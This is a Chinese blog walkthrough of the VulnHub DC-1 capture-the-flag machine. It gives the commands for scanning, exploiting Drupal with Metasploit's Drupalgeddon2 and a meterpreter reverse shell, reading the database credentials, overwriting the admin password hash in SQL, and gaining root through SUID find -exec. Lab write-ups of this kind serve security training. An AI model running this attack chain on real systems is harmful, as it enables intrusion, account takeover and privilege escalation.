靶机DC-1

已于 2023-08-13 16:04:23 修改
阅读量68 收藏
点赞数 1
分类专栏: 靶机记录 文章标签: 网络安全
于 2023-08-04 18:58:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acdcccc/article/details/132109724
版权

目录

环境搭建

DC-1靶机 下载地址:https://www.vulnhub.com/

kali 下载地址:https://www.kali.org/

将两台虚拟机都设置为nat模式

信息收集

  1. 扫描靶机ip

    nmap 192.168.117.0/24

在这里插入图片描述

  1. 对靶机进行详细扫描

    nmap -A 192.168.117.144 -p-

在这里插入图片描述

  1. 开放80端口,用浏览器访问

在这里插入图片描述

  1. 使用wappalyzer插件,可以看到靶机系统为Drupal 7,网站可能存在漏洞

在这里插入图片描述

  1. 尝试注册用户,注册失败

在这里插入图片描述

  1. 扫描敏感目录,发现都没什么用
  dirb http://192.168.117.144

在这里插入图片描述

漏洞检测

  1. 进入msf工具,查找系统漏洞

    msfconsole
//进入msf工具

search Drupa
//查找Drupa系统的漏洞

在这里插入图片描述

  1. 经过尝试,发现只有geddon2漏洞可以利用,查看并选择payload,选择meterpreter目录下的reverse_tcp服务

    use 1
//使用第一个漏洞

show payloads
//查看payloads

set payload php/meterpreter/reverse_tcp
//选择tcp服务

在这里插入图片描述

在这里插入图片描述

  1. 查看是否有需要手工设置的选项

    show options

在这里插入图片描述

  1. 其中required显示为yes表示需要我们手动设置,从描述看出,rhosts最有可能需要我们设置,设置完ip地址后运行

    set rhosts 192.168.117.144

run

在这里插入图片描述

  1. 可以看到我们获得了meterpreter的shell,表明我们成功入侵了该靶机,并且可以看到攻击机和被攻击机的ip

漏洞利用

  1. 查看靶机文件,发现第一个flag

    ls
//查看当前目录下文件

cat flag1.txt

在这里插入图片描述

在这里插入图片描述

  1. 第一个flag意思是“每个好的CMS都需要一个配置文件 - 你也是。”提示需要查找cms的配置文件,此时有两种方法

    1. 在该目录下遍历所有的子目录及文件,查找所有配置文件,发现在/sites/default下存在setting.php文件

    2. 开启一个shell,使用find命令查找包含set的文件

      shell

python -c "import pty;pty.spawn('/bin/bash')"

find ./ -name "set*"

  2. 查看配置文件

    cat ./sites/default/settings.php

在这里插入图片描述

  1. 得到第二个flag,意思是“暴力破解和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。 您可以使用这些凭据做什么?”得到数据库的用户名和密码,就想办法进入mysql

  2. 打开shell,进入交互模式(如果第二步进入则无需再次进入)

    shell

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

  1. 登录mysql

    mysql -udbuser -pR0ck3t

在这里插入图片描述

  1. 查看数据库信息,查找是否有user表

    show databases;

use drupaldb;

show tables;

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

  1. 发现其中有users表,查看用户信息

    select * from users;

在这里插入图片描述

  1. users表中密码被加密,哈希密码是单向不可逆的,很难被解密软件爆破,因此采用替换的方法,找到靶机的加密算法,将我们自己设定的密码转换为哈希密文,并替换users表中的密码

  2. 查百度发现drupal默认使用passwd_hash.sh生成密码,查找该文件

    find ./ -name "*hash*"

在这里插入图片描述

  1. 查看这个hash文件,确认是否是需要的文件

    cat ./scripts/password-hash.sh

在这里插入图片描述

  1. 生成密码为dc1的哈希值

    php ./scripts/password-hash.sh dc1

在这里插入图片描述

  1. 登录数据库,进行替换

    mysql -udbuser -pR0ck3t

update drupaldb.users set pass="$S$DVftcmOmxR/.9z3nr04ywKkGVHKdIbhVItV5Ruk5u9BUuHk3Aq82" where name="admin";

在这里插入图片描述

  1. 使用admin登录,密码为dc1

在这里插入图片描述

  1. 找寻有用的信息,在Dashboard中发现第三个flag

在这里插入图片描述

在这里插入图片描述

  1. 第三个flag意思是“特殊的权限将帮助找到密码 - 但您需要执行一些命令来弄清楚如何获隐藏内容。”提示为:提权,passwd文件、shadow文件

  2. 退出mysql,尝试查看passwd文件是否存在

    cat /etc/passwd

在这里插入图片描述

  1. 发现第四个flag的路径,进入此路径查看flag4

    cat /home/flag4/flag4.txt

在这里插入图片描述

提权

  1. 第四个flag意思是“您可以使用相同的方法来查找或访问 root 中的flag吗?可能。但也许这并不容易。 或者也许是?”提示另一个flag在root里,需要提权,尝试查找flag文件

    find / -name "*flag*"

在这里插入图片描述

  1. 最后一个flag在root中,使用提示中的find -perm命令进行提权

    find / -perm -u=s -type f 2>/dev/null

//-perm 按照权限查找
  -u=s  拥有者是s权限
  -type 查找,f文件、d目录、c字符设备
  2>/dev/null 将标准错误stderr删掉

在这里插入图片描述

  1. 查找出有root权限的目录,发现/usr/bin/find是root权限

  2. 创建一个文件dc-1,测试-exec后的命令是否能执行

    touch dc-1

find dc-1 -exec whoami \;

在这里插入图片描述

  1. 确认find拥有root权限,并且-exec后的命令可以以root权限执行,打开最后一个flag

    find dc-1 -exec cat /root/thefinalflag.txt \;

在这里插入图片描述

  1. 最后一个flag意思是“干的好!!!!希望您喜欢这个并学到了一些新技能。”
cwangc000
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
vulnhub靶机DC-1
cyzCc的博客
02-15 919
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
靶机DC-1攻略
weixin_43179779的博客
10-07 1140
dc-1靶机靶机攻略
渗透测试-靶机DC-1-知识点总结
qq_38678845的博客
01-11 2730
渗透测试靶机DC-1的知识点总结
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2777
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机的网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
靶机 DC-1
m0_66299232的博客
09-09 162
6:根据配置文件提示找到Flag2并发现数据库连接账号密码,根据提示需要提升权限访问敏感文件或者进行爆破账户,在此现在已有信息数据库下手。5:Drupal的默认配置文件为/var/www/sites/default/settings.php并查看。1:根据提示-exec,可能会是SUID提权,在此使用find命令查找suid权限的可执行二进制程序。3:查找敏感文件/etc/passwd发现存在Flag4用户,并使用hydra进行爆破。8:登录网站,搜索发现Flag3,并根据提示需要进行SUID提权。
靶机DC-1 WP
m0_66638011的博客
05-11 1697
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1497
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
DC系列(1)从0开始,kali配置和靶机DC-1
Nikris的博客
01-03 2692
从0开始的kali桥接设置和DC-1渗透。
DC系列靶机DC-1
weixin_53067829的博客
07-01 987
DC系列靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8375
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
仿羊了个羊/王了个王带后台三消游戏源码
08-10
仿羊了个羊、王了个王带后台三消游戏源码,游戏玩儿法类似于养了个羊,有两种模式,一个是普通版,一个是王者荣耀版。
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习
最新发布
08-10
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习 简历是展示个人经历、技能和能力的重要文档,以下是一个常见的简历格式和内容模板,供您参考: 简历格式: 头部信息:包括姓名、联系方式(电话号码、电子邮件等)、地址等个人基本信息。 求职目标(可选):简短描述您的求职意向和目标。 教育背景:列出您的教育经历,包括学校名称、所学专业、就读时间等。 工作经验:按时间顺序列出您的工作经历,包括公司名称、职位、工作时间、工作职责和成就等。 技能和能力:列出您的专业技能、语言能力、计算机技能等与职位相关的能力。 实习经验/项目经验(可选):如果您有相关实习或项目经验,可以列出相关信息。 获奖和荣誉(可选):列出您在学术、工作或其他领域获得的奖项和荣誉。 自我评价(可选):简要描述您的个人特点、能力和职业目标。 兴趣爱好(可选):列出您的兴趣爱好,展示您的多样性和个人素质。 参考人(可选):如果您有可提供推荐的人员,可以在简历中提供其联系信息。 简历内容模板: 姓名: 联系方式: 地址: 求职目标: (简短描述您的求职意
ASP新闻管理系统设计与实现(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值